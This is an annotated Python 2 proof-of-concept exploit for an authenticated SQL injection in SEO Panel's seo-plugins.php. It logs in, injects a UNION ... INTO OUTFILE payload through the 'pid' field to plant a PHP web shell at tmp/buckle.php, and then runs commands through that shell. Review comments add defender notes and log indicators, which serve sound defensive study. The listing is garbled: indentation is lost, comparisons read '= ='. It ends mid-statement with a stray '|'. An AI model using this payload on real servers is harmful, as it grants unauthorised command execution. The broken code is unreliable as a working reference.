import sys
import urllib2
import urllib
import cookielib
# Proof-of-concept for an authenticated SQL injection in SEO Panel's
# seo-plugins.php. It logs in through login.php, then POSTs a crafted `pid`
# value whose UNION ... INTO OUTFILE clause makes the database write a
# one-line PHP command runner to /var/www/seopanel/tmp/buckle.php.
#
# Args:
#   host, path: concatenated into the base URL (plain http, no TLS).
#   username, password: panel account submitted to login.php.
#
# NOTE(review): this listing lost its indentation and shows `= =` where `==`
# was meant, so it does not parse as-is and the nesting of the if/try/except
# below is inferred, not visible — confirm against the original advisory.
#
# Defender notes:
#   - Root cause is presumably `pid` reaching a SQL statement without
#     escaping (the server code is not on this page); the fix is an integer
#     cast or a bound parameter for that field.
#   - The file-write step depends on the DB account holding the MySQL FILE
#     privilege and on secure_file_priv allowing the target directory;
#     revoking FILE and restricting secure_file_priv stops it.
#   - The last step depends on tmp/ being web-reachable and PHP-executable;
#     disabling script execution in writable directories stops it.
#   - Log/WAF indicators: POSTs to seo-plugins.php whose `pid` contains
#     UNION or "into outfile"; new .php files under the panel's tmp/.
def exploit(host,path,username,password):
# Unused in the visible code: the Content-type header is set directly on the
# login request further down.
headers = { 'Content-type' : 'application/x-www-form-urlencoded' }
# Injected `pid`: closes the quoted value, UNION-selects empty columns plus a
# PHP snippet, and redirects the result set to a file in the web-served tmp/
# directory. `/**/` comments stand in for spaces.
payload = { 'pid' : '\' UNION/**/select/**/\'\',\'\',\'\',\'\',\'\',\'\',\'\',\'\',"\<\?php system($_REQUEST[\'cmd\']);\?\>"/**/from/**/seoplugins/**/into/**/outfile/**/\'/var/www/seopanel/tmp/buckle.php' }
base_url = "http://" + host + path
# Form fields for the panel's login handler.
post_args = { 'userName' : username, 'password' : password, 'sec' : 'login' , 'referer' :base_url, 'login' : 'Sign In >>' }
url_login = base_url + "/login.php"
url_plugins = base_url + "/seo-plugins.php"
# Cookie jar keeps the session cookie from the login response so the second
# request is sent as the logged-in user.
cj = cookielib.CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
request = urllib2.Request(url_login)
request.add_data(urllib.urlencode(post_args))
request.add_header( 'Content-type' , 'application/x-www-form-urlencoded' )
login_request = opener. open (request)
code = int (login_request.code)
# Only the HTTP status of the login response is checked; a 200 does not by
# itself show that the credentials were accepted.
if code = = 200 :
try :
# Sends the injected `pid` to the plugin page with the session cookie.
opener. open (url_plugins,urllib.urlencode(payload))
# Presumably the injected query makes the page error out, so the written file
# is verified from the exception handler — TODO confirm the intended nesting.
except Exception, e:
if check(base_url) = = True :
print "[*] Upload was successfull!"
# POST `command` as the `cmd` form field to <url>/tmp/buckle.php and return
# the urllib2 response object.
#
# This call uses plain urllib2.urlopen, not the cookie-carrying opener, so the
# written file is requested without any panel session. For incident
# response: requests to /tmp/buckle.php carrying a `cmd` parameter are the
# indicator to search access logs for, from any client, not only the account
# that was used to log in.
def shell(url,command):
url_shell = url + '/tmp/buckle.php'
encoded_args = urllib.urlencode({ 'cmd' :command})
return urllib2.urlopen(url_shell, encoded_args)
# Build the base URL from host and path (plain http), pass `command` to
# shell(), and print the response body.
def cmd(host,path,command):
url = "http://" + host + path
print shell(url,command).read()
# Report whether the written file answers: sends "ls" through shell() and
# returns True when the HTTP status is 200, False otherwise.
#
# NOTE(review): urllib2.urlopen raises HTTPError for 4xx/5xx responses, so a
# missing file most likely surfaces as an exception here rather than as a
# False return — confirm.
def check(url):
code = shell(url, "ls" ).code
if (code = = 200 ):
return True
else :
return False
# Mode "e" (six argv entries including the script name): argv[2..5] are passed
# to exploit() as host, path, username, password.
# NOTE(review): `= =` is extraction damage for `==`; indentation is also lost.
if len (sys.argv) = = 6 :
if str (sys.argv[ 1 ]) = = "e" :
exploit( str (sys.argv[ 2 ]), str (sys.argv[ 3 ]), str (sys.argv[ 4 ]), str (sys.argv[ 5 ]))
if len (sys.argv) = = 5 :
if str (sys.argv[ 1 ]) = = "c" :
|